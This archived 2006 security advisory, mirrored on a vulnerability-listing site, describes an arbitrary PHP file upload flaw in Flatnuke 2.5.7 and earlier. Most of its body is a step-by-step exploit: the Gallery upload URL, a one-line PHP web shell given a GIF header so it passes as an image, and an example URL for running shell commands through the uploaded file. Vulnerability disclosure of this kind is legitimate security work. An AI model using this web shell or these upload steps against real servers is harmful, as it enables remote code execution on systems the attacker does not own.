Security Advisory: flatnuke <= 2.5.7 arbitrary php file upload

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  [SA21038] CzarNews "tpath" File Inclusion Vulnerability
  SubberZ[Lite] - Remote File Include
  perForms <= 1.0 ([mosConfig_absol
ute_path]) Remote File Inclusion
  Flipper Poll <= 1.1.0 Remote File Inclusion Vulnerability

From: rgod_(at)_autistici.org <rgod_(at)_autistici.org>
Date: 14.07.2006
Subject: flatnuke <= 2.5.7 arbitrary php file upload

12/07/200619.11.54
----- Flatnuke 2.5.7 arbitrary file upload / remote code execution -------------
software:
site: http://www.flatnuke.org/
--------------------------------------------------------------------------------

if user Gallery uploads are enabled (not the default) you can go to:

http://[target]/[path_to_flatnuke]/index.php?mod=Gallery

to upload a shell.php file, ex:

GIF86<?php system($GET[cmd]);?>

file is renamed like this:

shell_by_[username].php

now you can launch commands, ex:

http://[target]/[path]/sections/Gallery/shell_by_rgod.php?cmd=ls%20-la

--------------------------------------------------------------------------------

rgod
site: http://rgod.altervista.org
mail: rgod @ autistici.org
--------------------------------------------------------------------------------

original url: http://retrogod.altervista.org/flatnuke257_adv.html

test server